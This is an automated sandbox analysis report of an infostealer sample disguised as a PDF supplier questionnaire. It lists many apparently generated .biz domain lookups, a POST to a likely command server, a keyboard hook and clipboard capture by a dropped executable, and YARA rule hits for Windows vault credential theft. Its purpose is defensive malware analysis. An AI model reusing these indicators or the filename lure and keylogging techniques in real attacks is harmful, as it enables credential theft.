Source: global traffic DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: przvgke.biz
Source: global traffic DNS traffic detected: DNS query: s82.gocheapweb.com
Source: global traffic DNS traffic detected: DNS query: zlenh.biz
Source: global traffic DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic DNS traffic detected: DNS query: deoci.biz
Source: global traffic DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic DNS traffic detected: DNS query: qaynky.biz
Source: global traffic DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic DNS traffic detected: DNS query: myups.biz
Source: global traffic DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic DNS traffic detected: DNS query: jpskm.biz
Source: global traffic DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic DNS traffic detected: DNS query: vyome.biz
Source: global traffic DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic DNS traffic detected: DNS query: esuzf.biz
Source: global traffic DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic DNS traffic detected: DNS query: brsua.biz
Source: global traffic DNS traffic detected: DNS query: dlynankz.biz
Source: global traffic DNS traffic detected: DNS query: oflybfv.biz
Source: global traffic DNS traffic detected: DNS query: yhqqc.biz
Source: global traffic DNS traffic detected: DNS query: mnjmhp.biz
Source: global traffic DNS traffic detected: DNS query: opowhhece.biz
Source: global traffic DNS traffic detected: DNS query: zjbpaao.biz
Source: global traffic DNS traffic detected: DNS query: jdhhbs.biz
Source: global traffic DNS traffic detected: DNS query: mgmsclkyu.biz
Source: global traffic DNS traffic detected: DNS query: warkcdu.biz
Source: global traffic DNS traffic detected: DNS query: gcedd.biz
Source: global traffic DNS traffic detected: DNS query: jwkoeoqns.biz
Source: global traffic DNS traffic detected: DNS query: xccjj.biz
Source: global traffic DNS traffic detected: DNS query: hehckyov.biz
Source: global traffic DNS traffic detected: DNS query: rynmcq.biz
Source: global traffic DNS traffic detected: DNS query: uaafd.biz
Source: global traffic DNS traffic detected: DNS query: eufxebus.biz
Source: global traffic DNS traffic detected: DNS query: pwlqfu.biz
Source: global traffic DNS traffic detected: DNS query: rrqafepng.biz
Source: global traffic DNS traffic detected: DNS query: ctdtgwag.biz
Source: global traffic DNS traffic detected: DNS query: tnevuluw.biz
Source: global traffic DNS traffic detected: DNS query: whjovd.biz
Source: global traffic DNS traffic detected: DNS query: gjogvvpsf.biz
Source: global traffic DNS traffic detected: DNS query: reczwga.biz
Source: global traffic DNS traffic detected: DNS query: bghjpy.biz
Source: global traffic DNS traffic detected: DNS query: damcprvgv.biz
Source: global traffic DNS traffic detected: DNS query: ocsvqjg.biz
Source: global traffic DNS traffic detected: DNS query: ywffr.biz
Source: global traffic DNS traffic detected: DNS query: ecxbwt.biz
Source: global traffic DNS traffic detected: DNS query: pectx.biz
Source: global traffic DNS traffic detected: DNS query: zyiexezl.biz
Source: global traffic DNS traffic detected: DNS query: banwyw.biz
Source: global traffic DNS traffic detected: DNS query: muapr.biz
Source: global traffic DNS traffic detected: DNS query: wxgzshna.biz
Source: global traffic DNS traffic detected: DNS query: zrlssa.biz
Source: global traffic DNS traffic detected: DNS query: jlqltsjvh.biz
Source: global traffic DNS traffic detected: DNS query: xyrgy.biz
Source: global traffic DNS traffic detected: DNS query: htwqzczce.biz
Source: global traffic DNS traffic detected: DNS query: kvbjaur.biz
Source: global traffic DNS traffic detected: DNS query: uphca.biz
Source: global traffic DNS traffic detected: DNS query: fjumtfnz.biz
Source: global traffic DNS traffic detected: DNS query: hlzfuyy.biz
Source: global traffic DNS traffic detected: DNS query: rffxu.biz
Source: global traffic DNS traffic detected: DNS query: cikivjto.biz
Source: global traffic DNS traffic detected: DNS query: qncdaagct.biz
Source: global traffic DNS traffic detected: DNS query: shpwbsrw.biz
Source: global traffic DNS traffic detected: DNS query: cjvgcl.biz
Source: global traffic DNS traffic detected: DNS query: neazudmrq.biz
Source: global traffic DNS traffic detected: DNS query: pgfsvwx.biz
Source: global traffic DNS traffic detected: DNS query: aatcwo.biz
Source: global traffic DNS traffic detected: DNS query: kcyvxytog.biz
Source: global traffic DNS traffic detected: DNS query: nwdnxrd.biz
Source: global traffic DNS traffic detected: DNS query: ereplfx.biz
Source: global traffic DNS traffic detected: DNS query: ptrim.biz
Source: unknown HTTP traffic detected: POST /ibmog HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 868
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 06 Sep 2024 11:07:23 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 06 Sep 2024 11:07:23 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 06 Sep 2024 11:07:33 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 06 Sep 2024 11:07:33 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.1Date: Fri, 06 Sep 2024 11:07:56 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 06 Sep 2024 11:08:26 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 06 Sep 2024 11:08:26 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.16:49714 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 00000010.00000002.1218270689.0000000003712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: initial sample Static PE information: Filename: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE
Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\52b8592e4ce608d8.bin
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Load Driver
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Security
Source: unknown Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 00000010.00000002.1218270689.0000000003712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
